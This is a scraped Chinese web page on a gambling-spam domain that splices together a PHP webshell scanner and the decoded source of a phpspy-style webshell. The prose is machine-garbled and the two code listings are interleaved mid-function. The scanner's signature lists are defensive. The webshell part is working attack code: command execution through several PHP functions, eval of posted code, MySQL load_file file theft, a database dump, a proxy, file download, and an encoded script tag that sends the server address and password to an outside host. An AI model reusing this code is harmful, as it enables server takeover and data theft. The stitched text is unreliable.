www.2527.com_澳门新葡8455手机版_新京葡娱乐场网址_
做最好的网站

【www.2527.com】木马的解析,webshell扫描后门木马实

2019-08-03 01:44 来源:未知

 代码如下

浅析能够理解,此木马经过了base64举行了编码,然后实行削减。即使做了有关的保密措施,但是php代码要试行,其最终要生成php源代码,所以写出如下php程序对其开始展览解码,解压缩,写入文件。
解码解压缩代码如下:

scanner.php

<?php
/**********************
  php扫描后门
**********************/
error_reporting(E_ERROR);
ini_set('max_execution_time',20000);
ini_set('memory_limit','512M');
header("content-Type: text/html; charset=gb2312");
$matches = array(
  '/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru) [\'|\"]\s*\)/i',
  '/(exec|shell\_exec|system|passthru) \s*\(\s*\$\_(\w )\[(.*)\]\s*\)/i',
  '/((udp|tcp)\:\/\/(.*)\;) /i',
  '/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',
  '/preg\_replace\s*\((.*)\(base64\_decode\(\$/i',
  '/(eval|assert|include|require|include\_once|require\_once) \s*\(\s*(base64\_decode|str\_rot13|gz(\w )|file\_(\w )\_contents|(.*)php\:\/\/input) /i',
  '/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk) \s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION) \[(.*)\]\s*\)/i',
  '/eval\s*\(\s*\(\s*\$\$(\w )/i',
  '/(include|require|include\_once|require\_once) \s*\(\s*[\'|\"](\w )\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js) [\'|\"]\s*\)/i',
  '/\$\_(\w )(.*)(eval|assert|include|require|include\_once|require\_once) \s*\(\s*\$(\w )\s*\)/i',
  '/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES) \[(.*)\]\[(.*)\]\s*\)/i',
  '/(fopen|fwrite|fputs|file\_put\_contents) \s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER) \[(.*)\](.*)\)/i',
  '/echo\s*curl\_exec\s*\(\s*\$(\w )\s*\)/i',
  '/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i',
  '/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i',
  '/\$\_\=(.*)\$\_/i',
  '/\$\_(GET|POST|REQUEST|COOKIE|SERVER) \[(.*)\]\(\s*\$(.*)\)/i',
  '/\$(\w )\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER) \[(.*)\]\s*\)/i',
  '/\$(\w )\(\$\{(.*)\}/i'
);
function antivirus($dir,$exs,$matches) {
  if(($handle = @opendir($dir)) == NULL) return false;
  while(false !== ($name = readdir($handle))) {
    if($name == '.' || $name == '..') continue;
    $path = $dir.$name;
    if(is_dir($path)) {
      if(is_readable($path)) antivirus($path.'/',$exs,$matches);
    } elseif(strpos($name,';') > -1 || strpos($name,'\0') > -1 || strpos($name,'/') > -1) {
      echo '<p>特征 <input type="text" style="width:218px;" value="深入分析漏洞"> '.$path.'</p>'; flush(); ob_flush();
    } else {
      if(preg_match($exs,$name)) continue;
      if(filesize($path) > 10000000) continue;
      $fp = fopen($path,'r');
      $code = fread($fp,filesize($path));
      fclose($fp);
      if(empty($code)) continue;
      foreach($matches as $matche) {
        $array = array();
        preg_match($matche,$code,$array);
        if(!$array) continue;
        if(strpos($array[0],"\x24\x74\x68\x69\x73\x2d\x3e")) continue;
        $len = strlen($array[0]);
        if($len > 10 && $len < 1500) {
          echo '<p>特征 <input type="text" style="width:218px;" value="'.htmlspecialchars($array[0]).'"> '.$path.'</p>';
          flush(); ob_flush(); break;
        }
      }
      unset($code,$array);
    }
  }
  closedir($handle);
  return true;
}
function strdir($str) { return str_replace(array('\\','//','//'),array('/','/','/'),chop($str)); }
echo '<form method="POST">';
echo '<p>路径: <input type="text" name="dir" value="'.($_POST['dir'] ? strdir($_POST['dir'].'/') : strdir($_SERVER['DOCUMENT_ROOT'].'/')).'" style="width:398px;"></p>';
echo '<p>后缀: <input type="text" name="exs" value="'.($_POST['exs'] ? $_POST['exs'] : '.php|.inc|.phtml').'" style="width:398px;"></p>';
echo '<p>操作: <input type="submit" style="width:80px;" value="scan"></p>';
echo '</form>';
if(file_exists($_POST['dir']) && $_POST['exs']) {
  $dir = strdir($_POST['dir'].'/');
  $exs = '/('.str_replace('.','\\.',$_POST['exs']).')/i';
  echo antivirus($dir,$exs,$matches) ? '<p>扫描达成</p>' : '<p>扫描中断</p>';
}
?>

复制代码 代码如下:

复制代码 代码如下:

<?php
function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>

<?php
/**************PHP Web木马扫描器************************/
/* [ ] 作者: alibaba */
/* [ ] QQ: 1499281192 */
/* [ ] MSN: weeming21@hotmail.com */
/* [ ] 首发: t00ls.net , 转发请评释t00ls */
/* [ ] 版本: v1.0 */
/* [ ] 成效: web版php木马扫描工具 */
/* [ ] 注意: 扫描出来的文件并不一定正是后门, */
/* 请自行推断、调查、比较最初的小说件。 */
www.2527.com,/* 如果你不分明扫出来的文书是还是不是为后门, */
/* 迎接你把该文件发给我举行剖析。 */
/*******************************************************/
ob_start();
set_time_limit(0);
$username = "t00ls"; //设置用户名
$password = "t00ls"; //设置密码
$md5 = md5(md5($username).md5($password));
$version = "PHP Web木马扫描器 v1.0";
$realpath = realpath('./');
$selfpath = $_SERVER['PHP_SELF'];
$selfpath = substr($selfpath, 0, strrpos($selfpath,'/'));
define('REALPATH', str_replace('//','/',str_replace('\','/',substr($realpath, 0, strlen($realpath) - strlen($selfpath)))));
define('MYFILE', basename(__FILE__));
define('MYPATH', str_replace('\', '/', dirname(__FILE__)).'/');
define('MYFULLPATH', str_replace('\', '/', (__FILE__)));
define('HOST', "]);
?>
<html>
<head>
<title><?php echo $version?></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style>
body{margin:0px;}
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
</style>
</head>
<body>
<?php
if(!(isset($_COOKIE['t00ls']) && $_COOKIE['t00ls'] == $md5) && !(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5)))
{
echo '<form id="frmlogin" name="frmlogin" method="post" action="">用户名: <input type="text" name="username" id="username" /> 密码: <input type="password" name="password" id="password" /> <input type="submit" name="btnLogin" id="btnLogin" value="登陆" /></form>';
}
elseif(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5))
{
setcookie("t00ls", $md5, time() 60*60*24*365,"/");
echo "登录成功!";
header( 'refresh: 1; url='.MYFILE.'?action=scan' );
exit();
}
else
{
setcookie("t00ls", $md5, time() 60*60*24*365,"/");
$setting = getSetting();
$action = isset($_GET['action'])?$_GET['action']:"";
if($action=="logout")
{
setcookie ("t00ls", "", time() - 3600);
Header("Location: ".MYFILE);
exit();
}
if($action=="download" && isset($_GET['file']) && trim($_GET['file'])!="")
{
$file = $_GET['file'];
ob_clean();
if (@file_exists($file)) {
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".basename($file).""");
echo file_get_contents($file);
}
exit();
}
?>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr class="head">
<td><?php echo $_SERVER['SERVER_ADDR']?><span style="float: right; font-weight:bold;"><?php echo "<a href=';
</tr>
<tr class="alt1">
<td><span style="float: right;"><?=date("Y-m-d H:i:s",mktime())?></span>
<a href="?action=scan">扫描</a> |
<a href="?action=setting">设定</a> |
<a href="?action=logout">登出</a>
</td>
</tr>
</tbody></table>
<br>
<?php
if($action=="setting")
{
if(isset($_POST['btnsetting']))
{
$Ssetting = array();
$Ssetting['user']=isset($_POST['checkuser'])?$_POST['checkuser']:"php | php? | phtml";
$Ssetting['all']=isset($_POST['checkall'])&&$_POST['checkall']=="on"?1:0;
$Ssetting['hta']=isset($_POST['checkhta'])&&$_POST['checkhta']=="on"?1:0;
setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time() 60*60*24*365,"/");
echo "设置完成!";
header( 'refresh: 1; url='.MYFILE.'?action=setting' );
exit();
}
?>
<form name="frmSetting" method="post" action="?action=setting">
<FIELDSET style="width:400px">
<LEGEND>扫描设定</LEGEND>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="60">文件后缀:</td>
<td width="300"><input type="text" name="checkuser" id="checkuser" style="width:300px;" value="<?php echo $setting['user']?>"></td>
</tr>
<tr>
<td><label for="checkall">全部文件</label></td>
<td><input type="checkbox" name="checkall" id="checkall" <?php if($setting['all']==1) echo "checked"?>></td>
</tr>
<tr>
<td><label for="checkhta">设置文件</label></td>
<td><input type="checkbox" name="checkhta" id="checkhta" <?php if($setting['hta']==1) echo "checked"?>></td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="btnsetting" id="btnsetting" value="提交">
</td>
</tr>
</table>
</fieldset>
</form>
<?php
}
else
{
$dir = isset($_POST['path'])?$_POST['path']:MYPATH;
$dir = substr($dir,-1)!="/"?$dir."/":$dir;
?>
<form name="frmScan" method="post" action="">
<table width="100%%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35" style="vertical-align:middle; padding-left:5px;">扫描路线:</td>
<td width="690">
<input type="text" name="path" id="path" style="width:600px" value="<?php echo $dir?>">
  <input type="submit" name="btnScan" id="btnScan" value="起初扫描"></td>
</tr>
</table>
</form>
<?php
if(isset($_POST['btnScan']))
{
$start=mktime();
$is_user = array();
$is_ext = "";
$list = "";
if(trim($setting['user'])!="")
{
$is_user = explode("|",$setting['user']);
if(count($is_user)>0)
{
foreach($is_user as $key=>$value)
$is_user[$key]=trim(str_replace("?","(.)",$value));
$is_ext = "(.".implode("($|.))|(.",$is_user)."($|.))";
}
}
if($setting['hta']==1)
{
$is_hta=1;
$is_ext = strlen($is_ext)>0?$is_ext."|":$is_ext;
$is_ext.="(^.htaccess$)";
}
if($setting['all']==1 || (strlen($is_ext)==0 && $setting['hta']==0))
{
$is_ext="(. )";
}
$php_code = getCode();
if(!is_readable($dir))
$dir = MYPATH;
$count=$scanned=0;
scan($dir,$is_ext);
$end=mktime();
$spent = ($end - $start);
?>
<div style="padding:10px; background-color:#ccc">扫描: <?php echo $scanned?> 文件 | 开掘: <?php echo $count?> 疑心文件 | 耗费时间: <?php echo $spent?> 秒</div>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr class="head">
<td width="15" align="center">No.</td>
<td width="48%">文件</td>
<td width="12%">更新时间</td>
<td width="10%">原因</td>
<td width="20%">特征</td>
<td>动作</td>
</tr>
<?php echo $list?>
</table>
<?php
}
}
}
ob_flush();
?>
</body>
</html>
<?php
function scan($path = '.',$is_ext){
global $php_code,$count,$scanned,$list;
$ignore = array('.', '..' );
$replace=array(" ","n","r","t");
$dh = @opendir( $path );
while(false!==($file=readdir($dh))){
if( !in_array( $file, $ignore ) ){
if( is_dir( "$path$file" ) ){
scan("$path$file/",$is_ext);
} else {
$current = $path.$file;
if(MYFULLPATH==$current) continue;
if(!preg_match("/$is_ext/i",$file)) continue;
if(is_readable($current))
{
$scanned ;
$content=file_get_contents($current);
$content= str_replace($replace,"",$content);
foreach($php_code as $key => $value)
{
if(preg_match("/$value/i",$content))
{
$count ;
$j = $count % 2 1;
$filetime = date('Y-m-d H:i:s',filemtime($current));
$reason = explode("->",$key);
$url = str_replace(REALPATH,HOST,$current);
preg_match("/$value/i",$content,$arr);
$list.="
<tr class='alt$j' onmouseover='this.className="focus";' onmouseout='this.className="alt$j";'>
<td>$count</td>
<td><a href='$url' target='_blank'>$current</a></td>
<td>$filetime</td>
<td><font color=red>$reason[0]</font></td>
<td><font color=#090>$reason[1]</font></td>
<td><a href='?action=download&file=$current' target='_blank'>下载</a></td>
</tr>";
//echo $key . "-" . $path . $file ."(" . $arr[0] . ")" ."<br />";
//echo $path . $file ."<br />";
break;
}
}
}
}
}
}
closedir( $dh );
}
function getSetting()
{
$Ssetting = array();
if(isset($_COOKIE['t00ls_s']))
{
$Ssetting = unserialize(base64_decode($_COOKIE['t00ls_s']));
$Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | shtml";
$Ssetting['all']=isset($Ssetting['all'])?intval($Ssetting['all']):0;
$Ssetting['hta']=isset($Ssetting['hta'])?intval($Ssetting['hta']):1;
}
else
{
$Ssetting['user']="php | php? | phtml | shtml";
$Ssetting['all']=0;
$Ssetting['hta']=1;
setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time() 60*60*24*365,"/");
}
return $Ssetting;
}
function getCode()
{
return array(
'后门特征->cha88.cn'=>'cha88.cn',
'后门特征->c99shell'=>'c99shell',
'后门特征->phpspy'=>'phpspy',
'后门特征->Scanners'=>'Scanners',
'后门特征->cmd.php'=>'cmd.php',
'后门特征->str_rot13'=>'str_rot13',
'后门特征->webshell'=>'webshell',
'后门特征->EgY_SpIdEr'=>'EgY_SpIdEr',
'后门特征->tools88.com'=>'tools88.com',
'后门特征->SECFORCE'=>'SECFORCE',
'后门特征->eval("?>'=>'eval(('|")?>',
'嫌疑代码特征->system('=>'system(',
'疑惑代码特征->passthru('=>'passthru(',
'思疑代码特征->shell_exec('=>'shell_exec(',
'质疑代码特征->exec('=>'exec(',
'狐疑代码特征->popen('=>'popen(',
'质疑代码特征->proc_open'=>'proc_open',
'狐疑代码特征->eval($'=>'eval(('|"|s*)\$',
'疑惑代码特征->assert($'=>'assert(('|"|s*)\$',
'危险MYSQL代码->returns string soname'=>'returnsstringsoname',
'危险MYSQL代码->into outfile'=>'intooutfile',
'危险MYSQL代码->load_file'=>'select(s )(.*)load_file',
'加密后门特征->eval(gzinflate('=>'eval(gzinflate(',
'加密后门特征->eval(base64_decode('=>'eval(base64_decode(',
'加密后门特征->eval(gzuncompress('=>'eval(gzuncompress(',
'加密后门特征->eval(gzdecode('=>'eval(gzdecode(',
'加密后门特征->eval(str_rot13('=>'eval(str_rot13(',
'加密后门特征->gzuncompress(base64_decode('=>'gzuncompress(base64_decode(',
'加密后门特征->base64_decode(gzuncompress('=>'base64_decode(gzuncompress(',
'一句话后门特征->eval($_'=>'eval(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->assert($_'=>'assert(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->require($_'=>'require(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->require_once($_'=>'require_once(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->include($_'=>'include(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->include_once($_'=>'include_once(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->call_user_func("assert"'=>'call_user_func(("|')assert("|')',
'一句话后门特征->call_user_func($_'=>'call_user_func(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征->$_POST/GET/REQUEST/COOKIE[?]($_POST/GET/REQUEST/COOKIE[?]'=>'$_(POST|GET|REQUEST|COOKIE)[([^]] )](('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[',
'一句话后门特征->echo(file_get_contents($_POST/GET/REQUEST/COOKIE'=>'echo(file_get_contents(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'上传后门特征->file_put_contents($_POST/GET/REQUEST/COOKIE,$_POST/GET/REQUEST/COOKIE'=>'file_put_contents(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[([^]] )],('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'上传后门特征->fputs(fopen("?","w"),$_POST/GET/REQUEST/COOKIE['=>'fputs(fopen((. ),('|")w('|")),('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[',
'.htaccess插马特征->SetHandler application/x-httpd-php'=>'SetHandlerapplication/x-httpd-php',
'.htaccess插马特征->php_value auto_prepend_file'=>'php_valueauto_prepend_file',
'.htaccess插马特征->php_value auto_append_file'=>'php_valueauto_append_file'
);
}
?>

下一场在php的碰着下举办运作,会获取php明文文件如下:

三个在php情状下扫描php木马的工具,方今可扫出以下特征码

复制代码 代码如下:

复制代码 代码如下:

error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] $mtime[0];
@set_time_limit(0);
//非安全格局能够行使方面包车型大巴函数,超时撤消。
/*===================== 程序配置 =====================*/
// 是不是要求密码验证,1为需求表达,别的数字为直接步向.上面选项则不算
$admin['check'] = "1";
// 假设急需密码验证,请修改登入密码
//暗中认可端口表
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//跳转用的秒
$admin['jumpsecond'] = "1";
//Ftp破解用的连年端口
$alexa = "yes";
//是或不是呈现alexa排行,yes或是no
$admin['ftpport'] = "21";
// 是还是不是允许phpspy自个儿自动修改编辑后文件的时光为树立即间(yes/no)
$retime = "no";
// 默认cmd.exe的位置,proc_open函数要选拔的,linux系统请对应修改.(假诺是winnt系统在先后里仍是能够钦赐)
$cmd = "cmd.exe";
// 上面是phpspy展现版权那栏的,因为被过多顺序当成作为最重要词杀了,鱼寒允许自定义吧。照旧不懂别改

特征码:
后门特征->cha88.cn
后门特征->c99shell
后门特征->phpspy
后门特征->Scanners
后门特征->cmd.php
后门特征->str_rot13
后门特征->webshell
后门特征->EgY_SpIdEr
后门特征->tools88.com
后门特征->SECFORCE
后门特征->eval("?>
思疑代码特征->system(
思疑代码特征->passthru(
疑忌代码特征->shell_exec(
质疑代码特征->exec(
猜疑代码特征->popen(
狐疑代码特征->proc_open
疑忌代码特征->eval($
嫌疑代码特征->assert($
危险MYSQL代码->returns string soname
危险MYSQL代码->into outfile
危险MYSQL代码->load_file
加密后门特征->eval(gzinflate(
加密后门特征->eval(base64_decode(
加密后门特征->eval(gzuncompress(
加密后门特征->gzuncompress(base64_decode(
加密后门特征->base64_decode(gzuncompress(
一句话后门特征->eval($_
一句话后门特征->assert($_
一句话后门特征->require($_
一句话后门特征->require_once($_
一句话后门特征->include($_
一句话后门特征->include_once($_
一句话后门特征->call_user_func("assert"
一句话后门特征->call_user_func($_
一句话后门特征->$_POST/GET/REQUEST/COOKIE[?]($_POST/GET/REQUEST/COOKIE[?]
一句话后门特征->echo(file_get_contents($_POST/GET/REQUEST/COOKIE
上传后门特征->file_put_contents($_POST/GET/REQUEST/COOKIE,$_POST/GET/REQUEST/COOKIE
上传后门特征->fputs(fopen("?","w"),$_POST/GET/REQUEST/COOKIE[
.htaccess插马特征->SetHandler application/x-httpd-php
.htaccess插马特征->php_value auto_prepend_file
.htaccess插马特征->php_value auto_append_file

/*===================== 配置截止 =====================*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== 身份验证 =====================*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv="refresh" content="0;URL=".$self."">";echo "<span style="" style="""font-size: 12px; font-family: Verdana">注销成功......<p><a href="" href="""".$self."">三秒后活动退出或单击这里退出程序分界面>>></a></span>";exit;}
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time() (1*24*3600));echo "<meta http-equiv="refresh" content="0;URL=".$self."">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//mix.dll的代码
$mixdll = "7Zt/TBNnGMfflrqBFnaesBmyZMcCxs2k46pumo2IQjc3wSEgUKYthV6hDAocV6dDF5aum82FRBaIHoRlRl0y3Bb/cIkumnVixOIE/cMMF ePxW1Ixah1yLBwe 5aHMa5JcsWs T5JE f9/m z/u8z73HP9cruaXbSAwhRAcmy4QcIBEyyd8zCJbw1FcJZH/cyZQDmpyTKYVVzkamnq r5G21TIXN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTG4ozM3oZ1hrYpk7JS2wR1/Fzb2 DnZGWosZSV1lav mfbePD5zooqJf9BveWZCMnR6Ah/MmfFlHaRJKTM0jxCCAVBekQbmE0iMaOGlDqmIuehiZ5LpGA0D9BGUyMxdVdXy6YQskXxTGTJA8kkJPuv5h8Ec7f1P8UgcBsF8B9qow1N2b0lygy83SbYCPlcExGmncH0FjMNkTRyVMlLJ/ec3bQ8v4HnauoqCKmJCmpe5n15KwiCIAiCIAiCIAjyUBCzU2PFTJ1nCRGM4kqdNyAsKCr eitLKE9AXui/ cXt0wt 26cRT4u3xc2pid9c0Yb2iH2eSzGh3VZLD6zWHSOa3sxYBmoZ/T3berbdy1rx6rtXd8PDY0FRsWjSiytjxdm 9nWTshyN1ujy5SRYTnmO6nymMc9hZY64Z4qmuVB5oT9YKeZSvtxbLe12mMiv0sKD7ZAddnOIprG8oUIYpSlfXCyWJNB83jKldItSZM0QS1RdknymsENsV6YcvqSxdEKJpvCuCfAtMyj4lC KpltWyxviT t7vpXT5kM3clqq snAp3JGXr87YemMfXAu7xjkeMWL8XOVrsc0Ypwvfj8I7mVVzbChnJQIutdv3nVIEXVwCQ4PQ3YqUZUOdquC52dq1wEIh4aVfLWq2RzMgD2Wqmlev5AuxisZRS0N4Rev87SYAHfmUfm0Ou25pgsO58lJemX/NEUhZku1puSInsBxF4jrY4tEt75Y3EJ5R91xngylPgnO80xqhBmeSa376Z3 yCZxxUUF8ikY6GEwlCTLMrSgNLxaiQugOVjjM ndetBfKM4rGLoBR gdVcrEuOcpSRcn1UUxKSa9Z4ueCLOnaseqtWEx3Gc42vXQnJxGKR1vTo3VuOd4MpREuNGykKqTkwjMRC4BQRAEQRAEQRAE S YZCL EPhTYINgl8GuRfVGQprjwGaBKfHHzB9r98EYno/J1mnaURgrXwY0T9OSU8h975b/6f7FBUbrQqPBXlNDSIbWJtQ5CcktKMrKL4xoFq2D5zhCHtNYnS6nIHB8LWnV1tpq1LfTXcRqs1e7GwWrw 7cQMh6ku1stJXXcIVVPGez5zjLeRu/KQuyG8kqU/5qU87UXtOZ k3BhpTIbwRiolYCsR2sHqyMIiQPTHkP3gyxCNalnAOs0JJc89rsl9XCuc6NFXUuF1chTBta7ZzS/HRFjREEQRAEQRAEQRDkXyJIlb62MOA4aNU0L5op/TgenDEUlGW5vkySpJ6JJZ Co8 201e8i izrfRyengPPfLBpY5q peDHeX0dy3dwkD/cfoTGL8Z2u6vXjbS6j WbOk611TvP9ZLF9IXDneUrtzYUdKdJ9Ot9AVvR2nJxs6OElrqKKUraFeydTv9aqjD3zACGyVb204MOPq5Hnq5Io0pkvsHujbk81NdTzSVB4DQjlCno7 WXk717qR691C9Z2XLhS937Eg87wsMdJvVjEAgsX PpXP81oR0IuDob7B81ClJn1nOd/0sSTtCvv4 R78NjIM5d7d58ZPmq2XHTwz0OVb1 I1Nb3WbSxs6HQ7H fBIIDg6PjgxEQwPD0vfB8NjI2FFgWhQOnfp sjJG6BNSGdGxybOXL8THAteHJSuDe891r1X6u8b7BsdvxkeGZTGR2/fDo PSOO/jg6Hh1VRIqSkpGT MwzPNbidPNfI2JhGgXe6Khmbyw7GOF0CV8nxD/uvA0EQBEEQBEEQBPnfQkX D/3x9PfTQ l30jVsIpvMMqyBfZ59iX2FLWTXsdVsHSuwm9j32Fa2k93HHmKPsJfZUTbf6DI2GbcaH/YlIAiCIAiCIAiCIAjy1/wO";

落拓不羁设计,直接套用phpspy样式
小心: 扫描出来的文件并不一定便是后门, 请自行推断、核查、比较原来的文章件。

function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁止使用,请查看<PHP景况变量>";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "报告理事,主机变态,不恐怕取妥帖前进展用户名!";
echo"当前历程用户名:$user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit;
}
if($action=="mysqldown"){
    $link=@mysql_connect($host,$user,$password);
    if (!$link) {
        $downtmp = '数据库连接败北: ' . mysql_error();
    }else{
    $query="select load_file('".$filename."');";
    $result = @mysql_query($query, $link);
    if(!$result){
        $downtmp = "读取失利,大概是文件不设有相当大希望没file权限。<br>".mysql_error();
            }else{
    while ($row = mysql_fetch_array($result)) {
        $filename = basename($filename);
        if($rardown=="yes"){
            $zip = NEW Zip;
            $zipfiles[]=Array("$filename",$row[0]);
            $zip->Add($zipfiles,1);
            $code = $zip->get_file();
            $filename = "".$filename.".rar";
        }else{
            $code = $row[0];
        }
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=$filename");
        echo($code);
        exit;
    }
    }
    }
}
// 在线代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor="#F5F5F5" style="" style="""font-size: 12px;"><center><br><p><b>获取 U中华VL 内容战败</b></p></center></body>";exit;
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!--
alert('你要下的公文不设有!')
// --></script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 间接下载备份数据库
if ($_POST['backuptype'] == 'download') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
    @mysql_select_db($dbname) or die("选择数据库失利");    
    $table = array_flip($_POST['table']);
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "出错: ".mysql_error();

你或者感兴趣的小说:

  • php木马webshell扫描器代码
  • 精确查找PHP WEBSHELL木Matthew正版
  • 精确查找PHP WEBSHELL木马的法门(1)
  • PHP Web木马扫描器代码分享
  • 一句话木马的法规及选用深入分析(asp,aspx,php,jsp)
  • php 木马的解析(加密破解)
  • php检验图片木马多进制编制程序实行
  • php网址被挂木马后的修补方法总括
  • PHP 木马攻击的守卫设置格局
  • PHP完结webshell扫描文件木马的点子

    $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata.= sqldumptable($currow[0]);
            $mysqldata.= $mysqldata."rn";
        }
    }
    mysql_close();
    exit;
}

// 程序目录
$pathname=str_replace('\','/',dirname(__FILE__));
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]);

// 获取当前路径
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir=$_GET['dir'];
    $nowpath = getPath($pathname, $dir);
}

// 剖断读写景况
